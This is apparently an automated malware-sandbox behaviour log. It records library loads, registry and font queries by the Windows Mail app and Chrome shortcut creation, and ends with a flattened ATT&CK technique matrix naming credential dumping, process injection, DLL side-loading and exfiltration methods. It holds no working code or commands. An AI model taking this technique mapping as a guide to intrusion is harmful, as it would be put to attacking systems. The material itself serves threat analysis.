      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso98imm.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.model.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.storage.applicationdata.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: twinapi.appcore.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: wintypes.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxcomm.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: cryptsp.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.applicationmodel.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.globalization.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: bcp47langs.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: bcp47mrm.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: profapi.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.staterepositorycore.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.networking.connectivity.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.networking.hostname.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.energy.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rmclient.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.storage.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: wldp.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: propsys.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rometadata.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.diagnostics.telemetry.platformtelemetryclient.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.view.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hxshared.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.viewmodel.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: clipc.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.resources.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: logoncli.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.xaml.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coremessaging.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: iertutil.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dcomp.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windowmanagementapi.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: textinputframework.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: inputhost.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coreuicomponents.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coreuicomponents.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ntmarta.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: uxtheme.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: urlmon.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: srvcli.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: netutils.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dxgi.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mrmcorer.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.staterepositoryclient.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d3d11.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d3d10warp.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dxcore.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d2d1.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dwrite.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: textshaping.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.shell.servicehostbuilder.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: execmodelproxy.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: uiamanager.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.core.textinput.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.immersive.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dataexchange.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: cryptbase.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: userenv.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: profext.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hx.mail.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: threadpoolwinrt.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: twinapi.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.graphics.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hxcalendar.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.remotedesktop.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winsta.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.xaml.controls.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: directmanipulation.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.profile.systemid.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.profile.retailinfo.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msxml6.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: wininet.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: sspicli.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winhttp.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mswsock.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: iphlpapi.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winnsi.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winrttracing.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dnsapi.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rasadhlp.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: fwpuclnt.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: schannel.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windowscodecs.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: photometadatahandler.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ploptin.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mskeyprotect.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ntasn1.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ncrypt.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ncryptsslp.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msasn1.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dpapi.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rsaenh.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: gpapi.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: webservices.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dwmapi.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: execmodelclient.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeKey opened: \REGISTRY\A\{42e9c606-7c4b-ae05-ff37-891b08bab7a2}\LocalState\HKEY_CURRENT_USER\Software\Microsoft\Office Test\Special\PerfImm
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsym.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsym.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsb.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsb.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymsb.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymsb.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsl.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsl.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymsl.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymsl.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsl.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsl.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      1
      Process Injection
      1
      Masquerading
      OS Credential Dumping12
      System Information Discovery
      Remote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Deobfuscate/Decode Files or Information
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading
